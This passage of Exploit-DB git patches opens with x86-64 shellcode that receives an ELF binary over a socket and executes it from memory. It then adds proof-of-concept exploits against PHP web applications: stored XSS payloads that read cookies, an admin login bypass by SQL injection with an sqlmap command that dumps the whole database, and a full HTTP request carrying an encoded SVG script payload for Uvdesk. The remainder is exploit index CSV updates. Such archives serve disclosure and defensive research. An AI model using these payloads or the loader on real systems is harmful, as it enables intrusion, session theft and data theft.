+    push 0x13f
+    pop  rax
+    xor  rsi, rsi
+    syscall
+
+    ; Save file descriptor to r14
+
+    push rax
+    pop  r14
+
+    ; Allocate memory space for ELF file
+    ;
+    ; void *mmap(NULL, size_t count,
+    ;            PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
+
+    push 0x9
+    pop  rax
+    xor  rdi, rdi
+    push r12
+    pop  rsi
+    push 0x7
+    pop  rdx
+    xor  r9, r9
+    push 0x22
+    pop  r10
+    syscall
+
+    ; Save address to the allocated memory space to r15
+
+    push rax
+    pop  r15
+
+    ; Read ELF file from socket
+    ;
+    ; recvfrom(int sockfd, void *buf, size_t count, MSG_WAITALL, NULL, 0);
+
+    push 0x2d
+    pop  rax
+    push r13
+    pop  rdi
+    push r15
+    pop  rsi
+    push r12
+    pop  rdx
+    push 0x100
+    pop  r10
+    syscall
+
+    ; Write read ELF file data to the file descriptor
+    ;
+    ; size_t write(unsigned int fd, const char *buf, size_t count);
+
+    push 0x1
+    pop  rax
+    push r14
+    pop  rdi
+    push r12
+    pop  rdx
+    syscall
+
+    ; Execute ELF from file descriptor
+    ;
+    ; int execveat(int dfd, const char *filename,
+    ;              const char *const *argv,
+    ;              const char *const *envp,
+    ;              int flags);
+
+    push 0x142
+    pop  rax
+    push r14
+    pop  rdi
+    push rsp
+    sub  rsp, 8
+    mov  rsi, rsp
+    xor  r10, r10
+    xor  rdx, rdx
+    push 0x1000
+    pop  r8
+    syscall
\ No newline at end of file

From cb5ca4a416e4012a21587336c8bbf13fd43e9e0a Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 24 Aug 2023 00:16:24 +0000
Subject: [PATCH 09/17] DB: 2023-08-24

1 changes to exploits/shellcodes/ghdb

Color Prediction Game v1.0 - SQL Injection

Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection

Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
---
 files_exploits.csv | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/files_exploits.csv b/files_exploits.csv
index ddeed0ad1e..50cb6ca191 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16024,7 +16024,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,,2019-09-14,2019-09-14,1,,,,,http://www.exploit-db.comCollege-Management-System-master.zip,
 48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,,2020-06-17,2020-06-17,0,,,,,,
 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,,2019-09-16,2019-09-16,1,,,,,http://www.exploit-db.comCollegeManagementSystem-CMS-1-3.zip,
-51689,exploits/php/webapps/51689.txt,"Color Prediction Game v1.0 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
+51689,exploits/php/webapps/51689.txt,"Color Prediction Game v1.0 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-23,1,,,,,,
 40527,exploits/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 40526,exploits/php/webapps/40526.txt,"Colorful Blog - Persistent Cross-Site Scripting",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-14,0,,,,,,
 46209,exploits/php/webapps/46209.txt,"Coman 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,,
@@ -23669,7 +23669,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8480,exploits/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",webapps,php,,2009-04-19,,1,OSVDB-56025;OSVDB-56024;OSVDB-56023,,,,,
 12223,exploits/php/webapps/12223.txt,"Multi-Mirror - Arbitrary File Upload",2010-04-14,indoushka,webapps,php,,2010-04-13,,1,,,,,,
 5630,exploits/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,webapps,php,,2008-05-14,,1,OSVDB-45336;CVE-2008-2293,,,,,
-50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2022-02-16,0,,,,,,
+50739,exploits/php/webapps/50739.txt,"Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection",2022-02-16,"Saud Alenazi",webapps,php,,2022-02-16,2023-08-23,1,,,,,,
 51394,exploits/php/webapps/51394.py,"Multi-Vendor Online Groceries Management System 1.0 - Remote Code Execution",2023-04-25,Or4nG.M4N,webapps,php,,2023-04-25,2023-04-25,0,,,,,,
 4480,exploits/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,webapps,php,,2007-10-01,,1,OSVDB-39897;CVE-2007-5261;OSVDB-39896,,,,,
 5166,exploits/php/webapps/5166.html,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,webapps,php,,2008-02-19,2016-11-14,1,OSVDB-41942;CVE-2008-0911,,,,,
@@ -24741,7 +24741,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
 48969,exploits/php/webapps/48969.txt,"Online Examination System 1.0 - 'name' Stored Cross Site Scripting",2020-10-29,"Nikhil Kumar",webapps,php,,2020-10-29,2020-10-29,0,,,,,,
 51511,exploits/php/webapps/51511.txt,"Online Examination System Project 1.0 - Cross-site request forgery (CSRF)",2023-06-13,"Ramil Mustafayev",webapps,php,,2023-06-13,2023-06-13,0,,,,,,
-51246,exploits/php/webapps/51246.txt,"Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)",2023-04-05,"Muhammad Navaid Zafar Ansari",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
+51246,exploits/php/webapps/51246.txt,"Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)",2023-04-05,"Muhammad Navaid Zafar Ansari",webapps,php,,2023-04-05,2023-08-23,1,,,,,,
 5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,,

From fe2c42ff0efb324bf62eb2066df059ab5399c08d Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Fri, 25 Aug 2023 00:16:28 +0000
Subject: [PATCH 10/17] DB: 2023-08-25

4 changes to exploits/shellcodes/ghdb

User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)

Uvdesk 1.1.4 - Stored XSS (Authenticated)
---
 exploits/php/webapps/51694.txt |  33 ++++++++
 exploits/php/webapps/51695.txt |  39 +++++++++
 exploits/php/webapps/51696.txt | 140 +++++++++++++++++++++++++++++++++
 files_exploits.csv             |   3 +
 4 files changed, 215 insertions(+)
 create mode 100644 exploits/php/webapps/51694.txt
 create mode 100644 exploits/php/webapps/51695.txt
 create mode 100644 exploits/php/webapps/51696.txt

diff --git a/exploits/php/webapps/51694.txt b/exploits/php/webapps/51694.txt
new file mode 100644
index 0000000000..66cfe32557
--- /dev/null
+++ b/exploits/php/webapps/51694.txt
@@ -0,0 +1,33 @@
+# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
+# Google Dork: NA
+# Date: 19/08/2023
+# Exploit Author: Ashutosh Singh Umath
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 3.0
+# Tested on: Windows 11
+# CVE : Requested
+
+
+Description
+
+User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to
+Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.
+
+POC
+
+User side
+1. Go to the user registration page http://localhost/loginsystem.
+2. Enter <img src="x" onerror=alert(document.cookie)> in one of the
+fields (first name, last name, email, or contact).
+3. Click sign up.
+
+Admin side
+1. Login to admin panel http://localhost/loginsystem/admin.
+2. After login successfully go to manage user page.
+3. Payload
+
+
+Thanks and Regards,
+
+Ashutosh Singh Umath
\ No newline at end of file
diff --git a/exploits/php/webapps/51695.txt b/exploits/php/webapps/51695.txt
new file mode 100644
index 0000000000..ec64e77a1e
--- /dev/null
+++ b/exploits/php/webapps/51695.txt
@@ -0,0 +1,39 @@
+# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
+# Google Dork: NA
+# Date: 19/08/2023
+# Exploit Author: Ashutosh Singh Umath
+# Vendor Homepage: https://phpgurukul.com
+# Software Link:
+https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: 3.0
+# Tested on: Windows 11
+# CVE : Requested
+
+
+Proof Of Concept:
+
+1. Navigate to the admin login page.
+
+URL: http://192.168.1.5/loginsystem/admin/
+
+2. Enter "*admin' -- -*" in the admin username field and anything
+random in the password field.
+
+3. Now you successfully logged in as admin.
+
+4. To download all the data from the database, use the below commands.
+
+  4.1. Login to the admin portal and capture the request.
+
+  4.2. Copy the intercepted request in a file.
+
+  4.3. Now use the below command to dump all the data
+
+
+Command:  sqlmap -r <file-name> -p username -D loginsystem --dump-all
+
+
+
+Thanks and Regards,
+
+Ashutosh Singh Umath
\ No newline at end of file
diff --git a/exploits/php/webapps/51696.txt b/exploits/php/webapps/51696.txt
new file mode 100644
index 0000000000..e1ddc0f228
--- /dev/null
+++ b/exploits/php/webapps/51696.txt
@@ -0,0 +1,140 @@
+# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)
+# Date: 14/08/2023
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://www.uvdesk.com/
+# Software Link: https://github.com/MegaTKC/AeroCMS
+# Version: 1.1.4
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.
+
+## Example XSS Stored in new ticket
+
+-----------------------------------------------------------------------------------------------------------------------
+Param: reply
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+
+POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 812
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3
+Connection: close
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="threadType"
+
+forward
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="status"
+
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="subject"
+
+aaaa
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="to[]"
+
+test@local.host
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="reply"
+
+%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="pic"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk
+Content-Disposition: form-data; name="nextView"
+
+stay
+------WebKitFormBoundaryXCjJcGbgZxZWLsSk--
+
+
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+
+HTTP/1.1 302 Found
+Date: Mon, 14 Aug 2023 11:33:26 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Cache-Control: max-age=0, must-revalidate, private
+Location: /uvdesk/public/en/member/ticket/view/1
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
+Access-Control-Allow-Headers: Access-Control-Allow-Origin
+Access-Control-Allow-Headers: Authorization
+Access-Control-Allow-Headers: Content-Type
+X-Debug-Token: bf1b73
+X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
+X-Robots-Tag: noindex
+Expires: Mon, 14 Aug 2023 11:33:26 GMT
+Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 398
+
+<!DOCTYPE html>
+<html>
+    <head>
+        <meta charset="UTF-8" />
+        <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />
+
+        <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>
+    </head>
+    <body>
+        Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.
+    </body>
+</html>
+-----------------------------------------------------------------------------------------------------------------------
+Redirect and view response:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Mon, 14 Aug 2023 11:44:14 GMT
+Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
+X-Powered-By: PHP/7.4.29
+Cache-Control: max-age=0, must-revalidate, private
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
+Access-Control-Allow-Headers: Access-Control-Allow-Origin
+Access-Control-Allow-Headers: Authorization
+Access-Control-Allow-Headers: Content-Type
+X-Debug-Token: 254ce8
+X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8
+X-Robots-Tag: noindex
+Expires: Mon, 14 Aug 2023 11:44:14 GMT
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 300607
+
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>#1 vvvvvvvvvvvvvvvvvvvvv</title>
+[...]
+<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>
+[...]
+-----------------------------------------------------------------------------------------------------------------------
+
+XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 50cb6ca191..8080c89948 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -31333,6 +31333,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,,2020-12-03,2020-12-07,0,,,,,,
 49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
 48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
+51695,exploits/php/webapps/51695.txt,"User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
+51694,exploits/php/webapps/51694.txt,"User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
 48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,,2020-10-20,2020-10-20,0,,,,,,
 19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,webapps,php,,2012-06-15,2012-06-15,1,OSVDB-83162;OSVDB-82970;OSVDB-82969;OSVDB-82968,,,http://www.exploit-db.com/screenshots/idlt19500/2.png,,
 7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,webapps,php,,2008-12-20,2017-01-05,1,OSVDB-51232;CVE-2008-5863,,,,,
@@ -31348,6 +31350,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
+51696,exploits/php/webapps/51696.txt,"Uvdesk 1.1.4 - Stored XSS (Authenticated)",2023-08-24,"Hubert Wojciechowski",webapps,php,,2023-08-24,2023-08-24,0,,,,,,
 51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-08-02,1,CVE-2023-39147,,,,,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info

From 4c8ac36b6c485f39a763e5b0740978dcce2b2992 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Wed, 30 Aug 2023 00:16:32 +0000
Subject: [PATCH 11/17] DB: 2023-08-30

1 changes to exploits/shellcodes/ghdb

Online Clinic Management System 2.2 - HTML Injection
Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Online Clinic Management System 2.2 - HTML Injection
Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Purchase Order Management System 1.0 - Remote File Upload
Purchase Order Management-1.0 - Local File Inclusion
Purchase Order Management System 1.0 - Remote File Upload
Purchase Order Management-1.0 - Local File Inclusion

Restaurant Management System 1.0  - SQL Injection
---
 files_exploits.csv | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/files_exploits.csv b/files_exploits.csv
index 8080c89948..3beec49dbe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -24701,8 +24701,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48480,exploits/php/webapps/48480.txt,"online Chatting System 1.0 - 'id' SQL Injection",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
 41516,exploits/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,,
 13967,exploits/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",webapps,php,,2010-06-22,2010-06-22,1,,,,,,
-47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-12-04,2019-12-04,0,,,,,http://www.exploit-db.comonline-clinic-management-system-2.2.zip,
-51439,exploits/php/webapps/51439.txt,"Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
+47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-12-04,2023-08-29,1,,,,,http://www.exploit-db.comonline-clinic-management-system-2.2.zip,
+51439,exploits/php/webapps/51439.txt,"Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-08-29,1,,,,,,
 48429,exploits/php/webapps/48429.txt,"Online Clothing Store 1.0 - 'username' SQL Injection",2020-05-06,"Sushant Kamble",webapps,php,,2020-05-06,2020-05-06,0,,,,,,
 48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,,2020-05-07,2020-05-07,0,,,,,,
 48426,exploits/php/webapps/48426.txt,"Online Clothing Store 1.0 - Persistent Cross-Site Scripting",2020-05-06,"Sushant Kamble",webapps,php,,2020-05-06,2020-05-06,0,,,,,,
@@ -28340,8 +28340,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11490,exploits/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,webapps,php,,2010-02-16,,1,,,,,,
 12466,exploits/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,webapps,php,,2010-04-29,,1,OSVDB-65023,,,,http://www.exploit-db.compuntal-2.1.0.zip,
 39157,exploits/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",webapps,php,,2014-04-06,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67241/info
-50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",2021-09-14,"Aryan Chehreghani",webapps,php,,2021-09-14,2021-09-14,0,,,,,,
-51312,exploits/php/webapps/51312.txt,"Purchase Order Management-1.0 - Local File Inclusion",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
+50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",2021-09-14,"Aryan Chehreghani",webapps,php,,2021-09-14,2023-08-29,1,,,,,,
+51312,exploits/php/webapps/51312.txt,"Purchase Order Management-1.0 - Local File Inclusion",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-08-29,1,,,,,,
 17343,exploits/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",webapps,php,,2011-05-29,2011-05-29,0,,,,,http://www.exploit-db.compuzzle-3.2.tar.gz,
 21391,exploits/php/webapps/21391.txt,"PVote 1.0/1.5 - Poll Content Manipulation",2002-04-18,"Daniel Nyström",webapps,php,,2002-04-18,2012-09-19,1,CVE-2002-0588;OSVDB-14423,,,,,https://www.securityfocus.com/bid/4540/info
 21397,exploits/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",webapps,php,,2002-04-18,2012-09-19,1,CVE-2002-0589;OSVDB-14425,,,,,https://www.securityfocus.com/bid/4541/info
@@ -28736,7 +28736,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43297,exploits/php/webapps/43297.txt,"Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2018-11-20,1,CVE-2017-17628,"SQL Injection (SQLi)",,,,
 50049,exploits/php/webapps/50049.py,"Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-22,Tagoletta,webapps,php,,2021-06-22,2021-06-22,0,,,,,,
 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80,2019-08-02,2019-08-02,0,,"SQL Injection (SQLi)",,,,
-51330,exploits/php/webapps/51330.txt,"Restaurant Management System 1.0  - SQL Injection",2023-04-08,calfcrusher,webapps,php,,2023-04-08,2023-04-08,0,,,,,,
+51330,exploits/php/webapps/51330.txt,"Restaurant Management System 1.0  - SQL Injection",2023-04-08,calfcrusher,webapps,php,,2023-04-08,2023-08-29,1,,,,,,
 47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,,2019-10-17,2019-10-17,0,,,,,,
 48885,exploits/php/webapps/48885.txt,"Restaurant Reservation System 1.0 - 'date' SQL Injection (Authenticated)",2020-10-16,b1nary,webapps,php,,2020-10-16,2020-10-16,0,,,,,,
 34760,exploits/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",webapps,php,80,2014-09-24,2014-09-24,0,CVE-2014-6619;OSVDB-112019,,,,http://www.exploit-db.comRSv1.0.0.zip,

From 4e246a01fb46a534d0726023cf5e7c395619abd2 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 5 Sep 2023 00:16:27 +0000
Subject: [PATCH 12/17] DB: 2023-09-05

18 changes to exploits/shellcodes/ghdb

DLINK DPH-400SE - Exposure of Sensitive Information

FileMage Gateway 1.10.9 - Local File Inclusion

Academy LMS 6.1 - Arbitrary File Upload

AdminLTE PiHole 5.18 - Broken Access Control

Blood Donor Management System v1.0 - Stored XSS

Bus Reservation System 1.1 - Multiple-SQLi

Credit Lite 1.5.4 - SQL Injection
